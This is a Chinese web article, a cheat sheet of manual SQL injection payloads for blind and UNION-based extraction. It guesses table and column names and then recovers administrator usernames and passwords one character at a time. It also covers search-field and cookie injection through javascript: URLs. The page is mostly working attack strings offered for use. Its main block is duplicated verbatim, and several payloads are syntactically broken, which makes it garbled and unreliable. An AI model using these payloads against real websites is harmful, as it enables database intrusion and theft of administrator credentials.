教你如何手工注入猜解语句
网络安全 2021-07-03 09:19www.168986.cn网络安全知识
猜解表名
and exists (select from 表名)
猜解列名
and exists (select 字段 from 表名)
UNION法
联合查询
select name,password,id from user union select user,pwd,uid from
爆指定表名内容
and 1=1 union select 1,2,3,4,5 from 表名
ASCII逐字解码法
1、猜解列长度
猜解语句
and (select 1 len(列名)from 表名)>N
and (select 1 len(列名)from 表名)=N
其中N是数字,变换这个N的值猜解列长度,例如
and (select 1 len(列名)from 表名)>1
and (select 1 len(列名)from 表名)>6
如果一直猜到6都显示正常页面,猜到7的时候返回错误(大于6并且小于等于7),那么该列的长度为7。因为“ 1”的意思是把最靠前的1条记录给提取出来,所以如果要猜解第二条记录就该使用
select 1 len(列名) from 表名
where 列名 not in (select 1 列名 from 表名)
2、ASCII码分析法猜解用户和密码
ASC()函数和Mid函数
例如mid(列名,N,1)
ASC(mdi(列名,N,1))得到“列名”第N位字符ASCII码
猜解语句为
and (select 1 asc(mid(字段,1,1)) from 数据库名)=ASC码(通过转换工具换)
区间判断语句
“......between......and......”
中文处理法:
当ASCII转换后为“负数”使用abs()函数取绝对值。
例and (select 1 abs(asc(mid(字段,1,1))) from 数据库名)=ASC码(通过转换工具换)
ASCII逐字解码法的应用
1、猜解表名
and (select count() from admin)<>0
2、猜解列名
and (select count(列名) from 表名)<>0
3、猜解管理员用户个数
and (select count() from 表名)=1
返回正常,表中有一条记录。
4、猜解管理员用户名的长度
and (select len(列名) from 表名)>=1、>=2、>=3、>=4。
5、猜解管理员用户名
and (select count()from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0
提交
and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理员的密码
按照上面的原理,只要把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到管理员的密码了。
搜索型注入漏洞利用猜解语句
关键字%' and 1=1 and '%'='%
关键字%' and 1=2 and '%'='%
将and 1=1 换成注入语句就可以了。
cookie注入语句:
javascript:alert(document.cookie="id=" escape("44 and 1=1"));
javascript:alert(document.cookie="id=" escape("44 and 1=2"));
猜解语句:
猜解长度:
javascript:alert(document.cookie="id=" escape("44 and (select len(password) from admin)=16"))
猜解内容:
javascript:alert(document.cookie="id=" escape("44 and (select asc(mid(username)) from admin)=97"))
and exists (select from 表名)
猜解列名
and exists (select 字段 from 表名)
UNION法
联合查询
select name,password,id from user union select user,pwd,uid from
爆指定表名内容
and 1=1 union select 1,2,3,4,5 from 表名
ASCII逐字解码法
1、猜解列长度
猜解语句
and (select 1 len(列名)from 表名)>N
and (select 1 len(列名)from 表名)=N
其中N是数字,变换这个N的值猜解列长度,例如
and (select 1 len(列名)from 表名)>1
and (select 1 len(列名)from 表名)>6
如果一直猜到6都显示正常页面,猜到7的时候返回错误(大于6并且小于等于7),那么该列的长度为7。因为“ 1”的意思是把最靠前的1条记录给提取出来,所以如果要猜解第二条记录就该使用
select 1 len(列名) from 表名
where 列名 not in (select 1 列名 from 表名)
2、ASCII码分析法猜解用户和密码
ASC()函数和Mid函数
例如mid(列名,N,1)
ASC(mdi(列名,N,1))得到“列名”第N位字符ASCII码
猜解语句为
and (select 1 asc(mid(字段,1,1)) from 数据库名)=ASC码(通过转换工具换)
区间判断语句
“......between......and......”
中文处理法:
当ASCII转换后为“负数”使用abs()函数取绝对值。
例and (select 1 abs(asc(mid(字段,1,1))) from 数据库名)=ASC码(通过转换工具换)
ASCII逐字解码法的应用
1、猜解表名
and (select count() from admin)<>0
2、猜解列名
and (select count(列名) from 表名)<>0
3、猜解管理员用户个数
and (select count() from 表名)=1
返回正常,表中有一条记录。
4、猜解管理员用户名的长度
and (select len(列名) from 表名)>=1、>=2、>=3、>=4。
5、猜解管理员用户名
and (select count()from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0
提交
and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理员的密码
按照上面的原理,只要把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到管理员的密码了。
搜索型注入漏洞利用猜解语句
关键字%' and 1=1 and '%'='%
关键字%' and 1=2 and '%'='%
将and 1=1 换成注入语句就可以了。
cookie注入语句:
javascript:alert(document.cookie="id=" escape("44 and 1=1"));
javascript:alert(document.cookie="id=" escape("44 and 1=2"));
猜解语句:
猜解长度:
javascript:alert(document.cookie="id=" escape("44 and (select len(password) from admin)=16"))
猜解内容:
javascript:alert(document.cookie="id=" escape("44 and (select asc(mid(username)) from admin)=97"))
上一篇:扫不出肉鸡的常见原因
下一篇:新的挂马方式-ARP欺骗
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座